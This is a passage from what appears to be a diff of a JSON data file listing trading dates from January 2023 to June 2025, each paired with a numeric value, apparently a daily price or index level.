"2023-01-26", + 8680.468957043446 + ], + [ + "2023-01-27", + 8766.87840606964 + ], + [ + "2023-01-30", + 8589.62263673319 + ], + [ + "2023-01-31", + 8718.346214221167 + ], + [ + "2023-02-01", + 8904.774892757967 + ], + [ + "2023-02-02", + 9224.366781604953 + ], + [ + "2023-02-03", + 9060.428990222406 + ], + [ + "2023-02-06", + 8983.785260584722 + ], + [ + "2023-02-07", + 9169.917534027443 + ], + [ + "2023-02-08", + 9006.866196388994 + ], + [ + "2023-02-09", + 8927.264859399507 + ], + [ + "2023-02-10", + 8868.673304606586 + ], + [ + "2023-02-13", + 9010.71301902304 + ], + [ + "2023-02-14", + 9077.295544690845 + ], + [ + "2023-02-15", + 9146.836598223172 + ], + [ + "2023-02-16", + 8975.205161572534 + ], + [ + "2023-02-17", + 8911.876648350612 + ], + [ + "2023-02-21", + 8700.88777007728 + ], + [ + "2023-02-22", + 8707.397635994477 + ], + [ + "2023-02-23", + 8783.447634931284 + ], + [ + "2023-02-24", + 8636.376398017179 + ], + [ + "2023-02-27", + 8698.222885768699 + ], + [ + "2023-02-28", + 8686.978822960644 + ], + [ + "2023-03-01", + 8617.143205359667 + ], + [ + "2023-03-02", + 8688.457166380187 + ], + [ + "2023-03-03", + 8868.07957390571 + ], + [ + "2023-03-06", + 8878.142618901016 + ], + [ + "2023-03-07", + 8769.245044258712 + ], + [ + "2023-03-08", + 8813.042118703612 + ], + [ + "2023-03-09", + 8660.345628590978 + ], + [ + "2023-03-10", + 8538.721965670215 + ], + [ + "2023-03-13", + 8602.050478892137 + ], + [ + "2023-03-14", + 8799.725061262423 + ], + [ + "2023-03-15", + 8845.88601235825 + ], + [ + "2023-03-16", + 9079.0721342299 + ], + [ + "2023-03-17", + 9036.162434041813 + ], + [ + "2023-03-20", + 9068.231255990811 + ], + [ + "2023-03-21", + 9197.74831543872 + ], + [ + "2023-03-22", + 9072.676411889306 + ], + [ + "2023-03-23", + 9180.261335400683 + ], + [ + "2023-03-24", + 9214.049675100436 + ], + [ + "2023-03-27", + 9150.920913137566 + ], + [ + "2023-03-28", + 9102.314159759217 + ], + [ + "2023-03-29", + 9268.284443215458 + ], + [ + "2023-03-30", + 9356.012986961581 + ], + [ + "2023-03-31", + 9511.610012637719 + ], + [ + "2023-04-03", + 9488.492256324866 + ], + [ + "2023-04-04", + 9456.484188215025 + ], + [ + "2023-04-05", + 9363.126709219514 + ], + [ + "2023-04-06", + 9426.252709644239 + ], + [ + "2023-04-10", + 9420.920179488934 + ], + [ + "2023-04-11", + 9360.458142860076 + ], + [ + "2023-04-12", + 9277.77032673875 + ], + [ + "2023-04-13", + 9459.447318643117 + ], + [ + "2023-04-14", + 9441.665774536428 + ], + [ + "2023-04-17", + 9449.666871051173 + ], + [ + "2023-04-18", + 9450.259681239335 + ], + [ + "2023-04-19", + 9445.813604828127 + ], + [ + "2023-04-20", + 9373.795451580985 + ], + [ + "2023-04-21", + 9383.576819685642 + ], + [ + "2023-04-24", + 9364.014083476328 + ], + [ + "2023-04-25", + 9187.3741371459 + ], + [ + "2023-04-26", + 9243.092771756756 + ], + [ + "2023-04-27", + 9494.422199231905 + ], + [ + "2023-04-28", + 9559.91851989656 + ], + [ + "2023-05-01", + 9548.954292953724 + ], + [ + "2023-05-02", + 9465.671825618807 + ], + [ + "2023-05-03", + 9403.728684032261 + ], + [ + "2023-05-04", + 9370.535916058814 + ], + [ + "2023-05-05", + 9569.700808513933 + ], + [ + "2023-05-08", + 9593.410454502233 + ], + [ + "2023-05-09", + 9532.653853804723 + ], + [ + "2023-05-10", + 9636.386431605768 + ], + [ + "2023-05-11", + 9667.799848502018 + ], + [ + "2023-05-12", + 9633.124134545453 + ], + [ + "2023-05-15", + 9685.286828540055 + ], + [ + "2023-05-16", + 9696.25289650832 + ], + [ + "2023-05-17", + 9813.61826761164 + ], + [ + "2023-05-18", + 9995.887149191454 + ], + [ + "2023-05-19", + 9973.36588511762 + ], + [ + "2023-05-22", + 10006.854137672433 + ], + [ + "2023-05-23", + 9880.005644583965 + ], + [ + "2023-05-24", + 9829.32589657248 + ], + [ + "2023-05-25", + 10068.503635703042 + ], + [ + "2023-05-26", + 10325.755641983516 + ], + [ + "2023-05-30", + 10372.5848853101 + ], + [ + "2023-05-31", + 10313.603953638929 + ], + [ + "2023-06-01", + 10432.749596332162 + ], + [ + "2023-06-02", + 10510.99133604228 + ], + [ + "2023-06-05", + 10518.402383907007 + ], + [ + "2023-06-06", + 10516.62303282981 + ], + [ + "2023-06-07", + 10338.205576447614 + ], + [ + "2023-06-08", + 10466.534253981057 + ], + [ + "2023-06-09", + 10506.545259631072 + ], + [ + "2023-06-12", + 10684.07626226917 + ], + [ + "2023-06-13", + 10766.174029740478 + ], + [ + "2023-06-14", + 10844.413928425165 + ], + [ + "2023-06-15", + 10973.636423804423 + ], + [ + "2023-06-16", + 10904.577718934514 + ], + [ + "2023-06-20", + 10888.968584834129 + ], + [ + "2023-06-21", + 10740.578253200094 + ], + [ + "2023-06-22", + 10867.305238610243 + ], + [ + "2023-06-23", + 10759.570271526398 + ], + [ + "2023-06-26", + 10615.332372747633 + ], + [ + "2023-06-27", + 10797.856236349371 + ], + [ + "2023-06-28", + 10818.928613410526 + ], + [ + "2023-06-29", + 10797.263426161211 + ], + [ + "2023-06-30", + 10963.758401864738 + ], + [ + "2023-07-03", + 10989.578783507468 + ], + [ + "2023-07-05", + 10989.283298926102 + ], + [ + "2023-07-06", + 10905.588441895074 + ], + [ + "2023-07-07", + 10869.381915294236 + ], + [ + "2023-07-10", + 10872.942458474061 + ], + [ + "2023-07-11", + 10926.661739468944 + ], + [ + "2023-07-12", + 11064.664085119442 + ], + [ + "2023-07-13", + 11252.527842978205 + ], + [ + "2023-07-14", + 11250.15476120013 + ], + [ + "2023-07-17", + 11355.214718335536 + ], + [ + "2023-07-18", + 11448.109179435636 + ], + [ + "2023-07-19", + 11445.438772050768 + ], + [ + "2023-07-20", + 11181.597735759646 + ], + [ + "2023-07-21", + 11148.059775518246 + ], + [ + "2023-07-24", + 11165.867093980942 + ], + [ + "2023-07-25", + 11241.547046806507 + ], + [ + "2023-07-26", + 11204.152138291203 + ], + [ + "2023-07-27", + 11177.441620853517 + ], + [ + "2023-07-28", + 11381.035099978266 + ], + [ + "2023-07-31", + 11386.970565961594 + ], + [ + "2023-08-01", + 11360.558294643417 + ], + [ + "2023-08-02", + 11111.260438729247 + ], + [ + "2023-08-03", + 11093.454040779265 + ], + [ + "2023-08-04", + 11041.51595188701 + ], + [ + "2023-08-07", + 11135.002302662555 + ], + [ + "2023-08-08", + 11040.327569972544 + ], + [ + "2023-08-09", + 10918.944160870275 + ], + [ + "2023-08-10", + 10939.125481623758 + ], + [ + "2023-08-11", + 10869.381915294236 + ], + [ + "2023-08-14", + 10991.358134584667 + ], + [ + "2023-08-15", + 10874.722730063973 + ], + [ + "2023-08-16", + 10759.570271526398 + ], + [ + "2023-08-17", + 10642.045651723462 + ], + [ + "2023-08-18", + 10628.690853260976 + ], + [ + "2023-08-21", + 10799.93383354608 + ], + [ + "2023-08-22", + 10784.500517374172 + ], + [ + "2023-08-23", + 10954.556036257523 + ], + [ + "2023-08-24", + 10720.397852959324 + ], + [ + "2023-08-25", + 10803.495297238618 + ], + [ + "2023-08-28", + 10884.813390440715 + ], + [ + "2023-08-29", + 11122.535798969597 + ], + [ + "2023-08-30", + 11184.564548238593 + ], + [ + "2023-08-31", + 11218.10158796728 + ], + [ + "2023-09-01", + 11206.228814975195 + ], + [ + "2023-09-05", + 11220.47651077078 + ], + [ + "2023-09-06", + 11121.646583687354 + ], + [ + "2023-09-07", + 11042.108762075171 + ], + [ + "2023-09-08", + 11057.54207824708 + ], + [ + "2023-09-11", + 11187.829606837053 + ], + [ + "2023-09-12", + 11063.775790349915 + ], + [ + "2023-09-13", + 11105.915941908652 + ], + [ + "2023-09-14", + 11196.733726324757 + ], + [ + "2023-09-15", + 11005.009338141233 + ], + [ + "2023-09-18", + 11016.483529127921 + ], + [ + "2023-09-19", + 10993.00493183097 + ], + [ + "2023-09-20", + 10834.587455197496 + ], + [ + "2023-09-21", + 10636.05035241369 + ], + [ + "2023-09-22", + 10637.536980447665 + ], + [ + "2023-09-25", + 10688.061161810394 + ], + [ + "2023-09-26", + 10527.568849518355 + ], + [ + "2023-09-27", + 10552.236749242487 + ], + [ + "2023-09-28", + 10640.510236515616 + ], + [ + "2023-09-29", + 10648.237940754145 + ], + [ + "2023-10-02", + 10737.10331770272 + ], + [ + "2023-10-03", + 10548.672524011805 + ], + [ + "2023-10-04", + 10692.22464081824 + ], + [ + "2023-10-05", + 10660.718252137822 + ], + [ + "2023-10-06", + 10839.34558541893 + ], + [ + "2023-10-09", + 10894.626976490381 + ], + [ + "2023-10-10", + 10954.961061851918 + ], + [ + "2023-10-11", + 11033.12639900673 + ], + [ + "2023-10-12", + 10994.787964959027 + ], + [ + "2023-10-13", + 10856.583106511329 + ], + [ + "2023-10-16", + 10979.330715456541 + ], + [ + "2023-10-17", + 10943.369965750484 + ], + [ + "2023-10-18", + 10799.81416689319 + ], + [ + "2023-10-19", + 10698.762122116874 + ], + [ + "2023-10-20", + 10539.159025107076 + ], + [ + "2023-10-23", + 10570.960898368861 + ], + [ + "2023-10-24", + 10673.797817298662 + ], + [ + "2023-10-25", + 10412.547103786244 + ], + [ + "2023-10-26", + 10214.010001002438 + ], + [ + "2023-10-27", + 10263.04939535662 + ], + [ + "2023-10-30", + 10378.665792302323 + ], + [ + "2023-10-31", + 10428.30075838281 + ], + [ + "2023-11-01", + 10609.303014467423 + ], + [ + "2023-11-02", + 10801.895446140756 + ], + [ + "2023-11-03", + 10928.804693068383 + ], + [ + "2023-11-06", + 10973.387885371498 + ], + [ + "2023-11-07", + 11077.114940096255 + ], + [ + "2023-11-08", + 11084.248913633906 + ], + [ + "2023-11-09", + 10998.947761916013 + ], + [ + "2023-11-10", + 11246.22969498535 + ], + [ + "2023-11-13", + 11211.15724004882 + ], + [ + "2023-11-14", + 11452.492660982256 + ], + [ + "2023-11-15", + 11461.113262553883 + ], + [ + "2023-11-16", + 11470.923166552691 + ], + [ + "2023-11-17", + 11473.596335475704 + ], + [ + "2023-11-20", + 11613.286901444662 + ], + [ + "2023-11-21", + 11545.8206835709 + ], + [ + "2023-11-22", + 11593.077965309742 + ], + [ + "2023-11-24", + 11576.7305800123 + ], + [ + "2023-11-27", + 11566.62427091941 + ], + [ + "2023-11-28", + 11596.93951614722 + ], + [ + "2023-11-29", + 11585.64574565258 + ], + [ + "2023-11-30", + 11556.518882339236 + ], + [ + "2023-12-01", + 11589.509137515486 + ], + [ + "2023-12-04", + 11481.919611440537 + ], + [ + "2023-12-05", + 11510.748228634371 + ], + [ + "2023-12-06", + 11444.173067068281 + ], + [ + "2023-12-07", + 11604.074410197587 + ], + [ + "2023-12-08", + 11655.787893987495 + ], + [ + "2023-12-11", + 11755.35423124255 + ], + [ + "2023-12-12", + 11848.975897387134 + ], + [ + "2023-12-13", + 11999.661987731222 + ], + [ + "2023-12-14", + 11989.262035082396 + ], + [ + "2023-12-15", + 12047.217515589573 + ], + [ + "2023-12-18", + 12123.098140186907 + ], + [ + "2023-12-19", + 12185.041281773452 + ], + [ + "2023-12-20", + 12003.977351336967 + ], + [ + "2023-12-21", + 12143.64674551349 + ], + [ + "2023-12-22", + 12161.813063934855 + ], + [ + "2023-12-26", + 12236.265052799228 + ], + [ + "2023-12-27", + 12261.173206341853 + ], + [ + "2023-12-28", + 12255.214727540664 + ], + [ + "2023-12-29", + 12202.178466979965 + ], + [ + "2024-01-02", + 11995.689975368 + ], + [ + "2024-01-03", + 11868.757715622509 + ], + [ + "2024-01-04", + 11807.675253424055 + ], + [ + "2024-01-05", + 11821.679933863003 + ], + [ + "2024-01-08", + 12066.008862144108 + ], + [ + "2024-01-09", + 12089.845538887013 + ], + [ + "2024-01-10", + 12171.78681919685 + ], + [ + "2024-01-11", + 12197.112885511875 + ], + [ + "2024-01-12", + 12203.369610432575 + ], + [ + "2024-01-16", + 12202.178466979965 + ], + [ + "2024-01-17", + 12133.348049263263 + ], + [ + "2024-01-18", + 12305.571375589347 + ], + [ + "2024-01-19", + 12549.602978263658 + ], + [ + "2024-01-22", + 12565.989945607824 + ], + [ + "2024-01-23", + 12618.135149860851 + ], + [ + "2024-01-24", + 12688.154870004733 + ], + [ + "2024-01-25", + 12703.648019503087 + ], + [ + "2024-01-26", + 12627.967146164809 + ], + [ + "2024-01-29", + 12757.282613328232 + ], + [ + "2024-01-30", + 12672.362553874158 + ], + [ + "2024-01-31", + 12424.160108090286 + ], + [ + "2024-02-01", + 12570.45995534961 + ], + [ + "2024-02-02", + 12782.90784627548 + ], + [ + "2024-02-05", + 12766.220791786376 + ], + [ + "2024-02-06", + 12740.597399864555 + ], + [ + "2024-02-07", + 12871.701423232324 + ], + [ + "2024-02-08", + 12895.538099975229 + ], + [ + "2024-02-09", + 13022.47035972072 + ], + [ + "2024-02-12", + 12971.518139945732 + ], + [ + "2024-02-13", + 12769.201411956043 + ], + [ + "2024-02-14", + 12908.34979593614 + ], + [ + "2024-02-15", + 12946.788565869727 + ], + [ + "2024-02-16", + 12829.390056308683 + ], + [ + "2024-02-20", + 12732.552118739513 + ], + [ + "2024-02-21", + 12681.59897845181 + ], + [ + "2024-02-22", + 13052.862007503836 + ], + [ + "2024-02-23", + 13014.425078595677 + ], + [ + "2024-02-26", + 13007.570020410529 + ], + [ + "2024-02-27", + 13038.856406552173 + ], + [ + "2024-02-28", + 12969.43133762188 + ], + [ + "2024-02-29", + 13080.571281236793 + ], + [ + "2024-03-01", + 13277.525102151598 + ], + [ + "2024-03-04", + 13230.14907427258 + ], + [ + "2024-03-05", + 12992.671522125765 + ], + [ + "2024-03-06", + 13074.314556316094 + ], + [ + "2024-03-07", + 13272.75868731573 + ], + [ + "2024-03-08", + 13081.169614501241 + ], + [ + "2024-03-11", + 13032.600602144186 + ], + [ + "2024-03-12", + 13219.424180635524 + ], + [ + "2024-03-13", + 13117.818907717772 + ], + [ + "2024-03-14", + 13084.743965371785 + ], + [ + "2024-03-15", + 12929.20861404752 + ], + [ + "2024-03-18", + 13052.519576774028 + ], + [ + "2024-03-19", + 13085.040370465866 + ], + [ + "2024-03-20", + 13240.18450388645 + ], + [ + "2024-03-21", + 13302.841963339477 + ], + [ + "2024-03-22", + 13318.056197485324 + ], + [ + "2024-03-25", + 13269.722836383191 + ], + [ + "2024-03-26", + 13226.758825944946 + ], + [ + "2024-03-27", + 13271.811479732472 + ], + [ + "2024-03-28", + 13247.34609280554 + ], + [ + "2024-04-01", + 13275.391353679302 + ], + [ + "2024-04-02", + 13160.820659177314 + ], + [ + "2024-04-03", + 13190.359912186768 + ], + [ + "2024-04-04", + 12988.670053355678 + ], + [ + "2024-04-05", + 13141.726463939696 + ], + [ + "2024-04-08", + 13145.606425031465 + ], + [ + "2024-04-09", + 13194.237111740395 + ], + [ + "2024-04-10", + 13079.071766024814 + ], + [ + "2024-04-11", + 13287.923213774993 + ], + [ + "2024-04-12", + 13076.089304829718 + ], + [ + "2024-04-15", + 12860.973768057123 + ], + [ + "2024-04-16", + 12862.16675253516 + ], + [ + "2024-04-17", + 12705.231301372089 + ], + [ + "2024-04-18", + 12632.731719975245 + ], + [ + "2024-04-19", + 12371.36962442437 + ], + [ + "2024-04-22", + 12495.785202408319 + ], + [ + "2024-04-23", + 12682.257145042702 + ], + [ + "2024-04-24", + 12725.22115548095 + ], + [ + "2024-04-25", + 12663.75852153139 + ], + [ + "2024-04-26", + 12859.184291340065 + ], + [ + "2024-04-29", + 12911.395772508538 + ], + [ + "2024-04-30", + 12667.936728742668 + ], + [ + "2024-05-01", + 12576.342031595494 + ], + [ + "2024-05-02", + 12736.857356705397 + ], + [ + "2024-05-03", + 12992.847340054243 + ], + [ + "2024-05-06", + 13135.16412879777 + ], + [ + "2024-05-07", + 13137.251851634339 + ], + [ + "2024-05-08", + 13129.49561150166 + ], + [ + "2024-05-09", + 13158.136444101727 + ], + [ + "2024-05-10", + 13189.166007196016 + ], + [ + "2024-05-13", + 13219.597237025857 + ], + [ + "2024-05-14", + 13304.629599031105 + ], + [ + "2024-05-15", + 13512.584467397326 + ], + [ + "2024-05-16", + 13485.136619275298 + ], + [ + "2024-05-17", + 13478.572443107942 + ], + [ + "2024-05-20", + 13572.555870749336 + ], + [ + "2024-05-21", + 13599.107139487409 + ], + [ + "2024-05-22", + 13596.422924411821 + ], + [ + "2024-05-23", + 13535.260377607203 + ], + [ + "2024-05-24", + 13663.255829537982 + ], + [ + "2024-05-28", + 13714.870818467436 + ], + [ + "2024-05-29", + 13618.204096263169 + ], + [ + "2024-05-30", + 13472.305592547382 + ], + [ + "2024-05-31", + 13447.244633894143 + ], + [ + "2024-06-03", + 13519.447810196905 + ], + [ + "2024-06-04", + 13556.442295681387 + ], + [ + "2024-06-05", + 13829.73883857622 + ], + [ + "2024-06-06", + 13824.964139125923 + ], + [ + "2024-06-07", + 13812.730525149742 + ], + [ + "2024-06-10", + 13868.525562315903 + ], + [ + "2024-06-11", + 13963.700133409908 + ], + [ + "2024-06-12", + 14146.593122610177 + ], + [ + "2024-06-13", + 14223.269990705583 + ], + [ + "2024-06-14", + 14296.965318118608 + ], + [ + "2024-06-17", + 14472.102067186197 + ], + [ + "2024-06-18", + 14476.575758978843 + ], + [ + "2024-06-20", + 14364.99212823552 + ], + [ + "2024-06-21", + 14326.50180958992 + ], + [ + "2024-06-24", + 14163.399843752171 + ], + [ + "2024-06-25", + 14325.365896900183 + ], + [ + "2024-06-26", + 14354.951175545364 + ], + [ + "2024-06-27", + 14392.00549435629 + ], + [ + "2024-06-28", + 14317.297602957276 + ], + [ + "2024-07-01", + 14401.270454828094 + ], + [ + "2024-07-02", + 14552.47939639404 + ], + [ + "2024-07-03", + 14673.803892682577 + ], + [ + "2024-07-05", + 14826.806913529153 + ], + [ + "2024-07-08", + 14862.068073572163 + ], + [ + "2024-07-09", + 14874.917510554369 + ], + [ + "2024-07-10", + 15030.011936288369 + ], + [ + "2024-07-11", + 14700.401187056375 + ], + [ + "2024-07-12", + 14786.762769421415 + ], + [ + "2024-07-15", + 14826.506826384215 + ], + [ + "2024-07-16", + 14832.185469320186 + ], + [ + "2024-07-17", + 14396.787557908305 + ], + [ + "2024-07-18", + 14328.65488882922 + ], + [ + "2024-07-19", + 14201.651749604709 + ], + [ + "2024-07-22", + 14413.223312426342 + ], + [ + "2024-07-23", + 14362.422056736537 + ], + [ + "2024-07-24", + 13847.237785279547 + ], + [ + "2024-07-25", + 13694.533931065196 + ], + [ + "2024-07-26", + 13834.984840536361 + ], + [ + "2024-07-29", + 13862.777880926342 + ], + [ + "2024-07-30", + 13672.421374636617 + ], + [ + "2024-07-31", + 14077.039181899849 + ], + [ + "2024-08-01", + 13736.07298782134 + ], + [ + "2024-08-02", + 13410.048556125179 + ], + [ + "2024-08-05", + 13010.211891901246 + ], + [ + "2024-08-06", + 13134.526213486597 + ], + [ + "2024-08-07", + 12992.281224734803 + ], + [ + "2024-08-08", + 13389.727317439087 + ], + [ + "2024-08-09", + 13459.654986311516 + ], + [ + "2024-08-12", + 13488.641011179534 + ], + [ + "2024-08-13", + 13823.330229057623 + ], + [ + "2024-08-14", + 13827.814046490126 + ], + [ + "2024-08-15", + 14177.145860118335 + ], + [ + "2024-08-16", + 14195.375693917003 + ], + [ + "2024-08-19", + 14381.845795525958 + ], + [ + "2024-08-20", + 14351.66494515447 + ], + [ + "2024-08-21", + 14418.60278873009 + ], + [ + "2024-08-22", + 14189.998058638685 + ], + [ + "2024-08-23", + 14343.89397681836 + ], + [ + "2024-08-26", + 14204.639733876093 + ], + [ + "2024-08-27", + 14247.073528990766 + ], + [ + "2024-08-28", + 14085.405721962265 + ], + [ + "2024-08-29", + 14064.785316643947 + ], + [ + "2024-08-30", + 14232.43001272793 + ], + [ + "2024-09-03", + 13800.32017273237 + ], + [ + "2024-09-04", + 13764.460679424912 + ], + [ + "2024-09-05", + 13777.311036919831 + ], + [ + "2024-09-06", + 13408.25447684455 + ], + [ + "2024-09-09", + 13580.679395455116 + ], + [ + "2024-09-10", + 13706.18946305665 + ], + [ + "2024-09-11", + 14003.82436212381 + ], + [ + "2024-09-12", + 14141.287287323592 + ], + [ + "2024-09-13", + 14204.639733876093 + ], + [ + "2024-09-16", + 14141.884700075325 + ], + [ + "2024-09-17", + 14149.355581266498 + ], + [ + "2024-09-18", + 14088.095460114138 + ], + [ + "2024-09-19", + 14444.301662694501 + ], + [ + "2024-09-20", + 14416.810550474887 + ], + [ + "2024-09-23", + 14455.024715306128 + ], + [ + "2024-09-24", + 14524.74987138136 + ], + [ + "2024-09-25", + 14538.216051882306 + ], + [ + "2024-09-26", + 14647.442249563699 + ], + [ + "2024-09-27", + 14566.045912780868 + ], + [ + "2024-09-30", + 14605.54695438703 + ], + [ + "2024-10-01", + 14402.055652173593 + ], + [ + "2024-10-02", + 14422.405426753838 + ], + [ + "2024-10-03", + 14411.632666455624 + ], + [ + "2024-10-04", + 14583.103013381216 + ], + [ + "2024-10-07", + 14426.893846749914 + ], + [ + "2024-10-08", + 14642.354575790461 + ], + [ + "2024-10-09", + 14757.566867654481 + ], + [ + "2024-10-10", + 14740.808933686356 + ], + [ + "2024-10-11", + 14763.850287443904 + ], + [ + "2024-10-14", + 14887.740252667852 + ], + [ + "2024-10-15", + 14688.739211475922 + ], + [ + "2024-10-16", + 14690.534211269267 + ], + [ + "2024-10-17", + 14700.708638303031 + ], + [ + "2024-10-18", + 14797.067909260642 + ], + [ + "2024-10-21", + 14825.497023936368 + ], + [ + "2024-10-22", + 14841.656624640045 + ], + [ + "2024-10-23", + 14614.22646877239 + ], + [ + "2024-10-24", + 14732.72867307816 + ], + [ + "2024-10-25", + 14822.503516588698 + ], + [ + "2024-10-28", + 14824.89869067192 + ], + [ + "2024-10-29", + 14967.340669144625 + ], + [ + "2024-10-30", + 14854.225305244317 + ], + [ + "2024-10-31", + 14479.262735592572 + ], + [ + "2024-11-01", + 14586.395687361111 + ], + [ + "2024-11-04", + 14543.902058919994 + ], + [ + "2024-11-05", + 14729.437840123695 + ], + [ + "2024-11-06", + 15129.53500944584 + ], + [ + "2024-11-07", + 15367.738846124425 + ], + [ + "2024-11-08", + 15385.695287646877 + ], + [ + "2024-11-11", + 15376.718447654723 + ], + [ + "2024-11-12", + 15348.884904705303 + ], + [ + "2024-11-13", + 15329.137145440365 + ], + [ + "2024-11-14", + 15222.603447448988 + ], + [ + "2024-11-15", + 14859.911312282005 + ], + [ + "2024-11-18", + 14963.152336293488 + ], + [ + "2024-11-19", + 15066.094193672745 + ], + [ + "2024-11-20", + 15057.416520312816 + ], + [ + "2024-11-21", + 15111.581329461535 + ], + [ + "2024-11-22", + 15135.820270260692 + ], + [ + "2024-11-25", + 15159.760044427625 + ], + [ + "2024-11-26", + 15241.155460697742 + ], + [ + "2024-11-27", + 15121.156502718137 + ], + [ + "2024-11-29", + 15254.02330793424 + ], + [ + "2024-12-02", + 15420.10681445437 + ], + [ + "2024-12-03", + 15467.389870549217 + ], + [ + "2024-12-04", + 15658.613499816036 + ], + [ + "2024-12-05", + 15615.218689427387 + ], + [ + "2024-12-06", + 15754.970929748219 + ], + [ + "2024-12-09", + 15632.275790027736 + ], + [ + "2024-12-10", + 15579.011242313834 + ], + [ + "2024-12-11", + 15857.910025589334 + ], + [ + "2024-12-12", + 15755.569263012667 + ], + [ + "2024-12-13", + 15876.167474769436 + ], + [ + "2024-12-16", + 16104.795217678704 + ], + [ + "2024-12-17", + 16033.871554049147 + ], + [ + "2024-12-18", + 15455.419523209393 + ], + [ + "2024-12-19", + 15386.591867030833 + ], + [ + "2024-12-20", + 15520.958187458917 + ], + [ + "2024-12-23", + 15672.172652101148 + ], + [ + "2024-12-24", + 15884.684058404322 + ], + [ + "2024-12-26", + 15873.891967339105 + ], + [ + "2024-12-27", + 15662.880996760623 + ], + [ + "2024-12-30", + 15454.565287410303 + ], + [ + "2024-12-31", + 15323.282684575917 + ], + [ + "2025-01-02", + 15293.309870077916 + ], + [ + "2025-01-03", + 15543.586231007637 + ], + [ + "2025-01-06", + 15722.22645146675 + ], + [ + "2025-01-07", + 15441.675347868659 + ], + [ + "2025-01-08", + 15444.375211660392 + ], + [ + "2025-01-10", + 15202.189236978726 + ], + [ + "2025-01-13", + 15153.333024654736 + ], + [ + "2025-01-14", + 15138.94541092654 + ], + [ + "2025-01-15", + 15487.23796570004 + ], + [ + "2025-01-16", + 15378.733449986841 + ], + [ + "2025-01-17", + 15638.303307282516 + ], + [ + "2025-01-21", + 15730.01951210801 + ], + [ + "2025-01-22", + 15931.140494081517 + ], + [ + "2025-01-23", + 15965.011679925577 + ], + [ + "2025-01-24", + 15874.79222877392 + ], + [ + "2025-01-27", + 15412.602794805473 + ], + [ + "2025-01-28", + 15640.3983942208 + ], + [ + "2025-01-29", + 15611.02667452539 + ], + [ + "2025-01-30", + 15677.566856608328 + ], + [ + "2025-01-31", + 15654.786007948995 + ], + [ + "2025-02-03", + 15529.49686339895 + ], + [ + "2025-02-04", + 15720.127682477609 + ], + [ + "2025-02-05", + 15791.465576828707 + ], + [ + "2025-02-06", + 15873.891967339105 + ], + [ + "2025-02-07", + 15673.669405774985 + ], + [ + "2025-02-10", + 15863.401804444255 + ], + [ + "2025-02-11", + 15825.635008792276 + ], + [ + "2025-02-12", + 15834.928505158232 + ], + [ + "2025-02-13", + 16062.725945598988 + ], + [ + "2025-02-14", + 16130.164548091312 + ], + [ + "2025-02-18", + 16166.730995163534 + ], + [ + "2025-02-19", + 16171.228620286756 + ], + [ + "2025-02-20", + 16102.585987163819 + ], + [ + "2025-02-21", + 15768.388323075293 + ], + [ + "2025-02-24", + 15582.251447069 + ], + [ + "2025-02-25", + 15385.926336338225 + ], + [ + "2025-02-26", + 15423.09203718761 + ], + [ + "2025-02-27", + 14994.773789063223 + ], + [ + "2025-02-28", + 15231.56371821228 + ], + [ + "2025-03-03", + 14898.258951456854 + ], + [ + "2025-03-04", + 14853.299269453495 + ], + [ + "2025-03-05", + 15046.92727793068 + ], + [ + "2025-03-06", + 14632.99480250906 + ], + [ + "2025-03-07", + 14740.599977300157 + ], + [ + "2025-03-10", + 14169.307694354064 + ], + [ + "2025-03-11", + 14135.43834953543 + ], + [ + "2025-03-12", + 14294.896926049047 + ], + [ + "2025-03-13", + 14037.725004374737 + ], + [ + "2025-03-14", + 14377.02414992722 + ], + [ + "2025-03-17", + 14470.239869964691 + ], + [ + "2025-03-18", + 14223.559952210662 + ], + [ + "2025-03-19", + 14413.89068414438 + ], + [ + "2025-03-20", + 14365.03447182039 + ], + [ + "2025-03-21", + 14412.391168932401 + ], + [ + "2025-03-24", + 14728.661847905341 + ], + [ + "2025-03-25", + 14812.711102331465 + ], + [ + "2025-03-26", + 14540.148208070117 + ], + [ + "2025-03-27", + 14457.298381711033 + ], + [ + "2025-03-28", + 14076.670056301318 + ], + [ + "2025-03-31", + 14076.068961498728 + ], + [ + "2025-04-01", + 14189.537802281417 + ], + [ + "2025-04-02", + 14293.098244204843 + ], + [ + "2025-04-03", + 13527.9395399885 + ], + [ + "2025-04-04", + 12687.733275181477 + ], + [ + "2025-04-07", + 12718.352289605082 + ], + [ + "2025-04-08", + 12489.313998025133 + ], + [ + "2025-04-09", + 13988.415899795194 + ], + [ + "2025-04-10", + 13393.457234958385 + ], + [ + "2025-04-11", + 13640.206191166006 + ], + [ + "2025-04-14", + 13732.662488213986 + ], + [ + "2025-04-15", + 13747.97153516943 + ], + [ + "2025-04-16", + 13333.422316229071 + ], + [ + "2025-04-17", + 13331.020698556847 + ], + [ + "2025-04-21", + 13001.121828845206 + ], + [ + "2025-04-22", + 13342.428612628091 + ], + [ + "2025-04-23", + 13645.010347023168 + ], + [ + "2025-04-24", + 14028.941472052637 + ], + [ + "2025-04-25", + 14185.334741226847 + ], + [ + "2025-04-28", + 14180.832513540052 + ], + [ + "2025-04-29", + 14274.488238655073 + ], + [ + "2025-04-30", + 14272.686795272726 + ], + [ + "2025-05-01", + 14459.098904580665 + ], + [ + "2025-05-02", + 14673.72749012727 + ], + [ + "2025-05-05", + 14586.676443739045 + ], + [ + "2025-05-06", + 14450.994710641891 + ], + [ + "2025-05-07", + 14507.727750264165 + ], + [ + "2025-05-08", + 14657.519102249724 + ], + [ + "2025-05-09", + 14647.913552073542 + ], + [ + "2025-05-12", + 15244.67181926727 + ], + [ + "2025-05-13", + 15477.011069441545 + ], + [ + "2025-05-14", + 15569.767453634466 + ], + [ + "2025-05-15", + 15586.876102946828 + ], + [ + "2025-05-16", + 15654.719731033549 + ], + [ + "2025-05-19", + 15669.727770331341 + ], + [ + "2025-05-20", + 15617.497878908578 + ], + [ + "2025-05-21", + 15400.466755177033 + ], + [ + "2025-05-22", + 15429.285246731006 + ], + [ + "2025-05-23", + 15286.396819591751 + ], + [ + "2025-05-27", + 15646.013521779469 + ], + [ + "2025-05-28", + 15576.669457968055 + ], + [ + "2025-05-29", + 15607.289392904375 + ], + [ + "2025-05-30", + 15582.674882917687 + ], + [ + "2025-06-02", + 15705.751114901987 + ], + [ + "2025-06-03", + 15828.521736665061 + ], + [ + "2025-06-04", + 15872.65111619991 + ], + [ + "2025-06-05", + 15753.177770980303 + ], + [ + "2025-06-06", + 15907.168501969574 + ], + [ + "2025-06-09", + 15930.584504401937 + ], + [ + "2025-06-10", + 16035.950071758569 + ], + [ + "2025-06-11", + 15981.914134389886 + ], + [ + "2025-06-12", + 16019.437914685224 + ], + [ + "2025-06-13", + 15818.316932711718 + ], + [ + "2025-06-16", + 16038.34892789265 + ], + [ + "2025-06-17", + 15881.955658718438 + ], + [ + 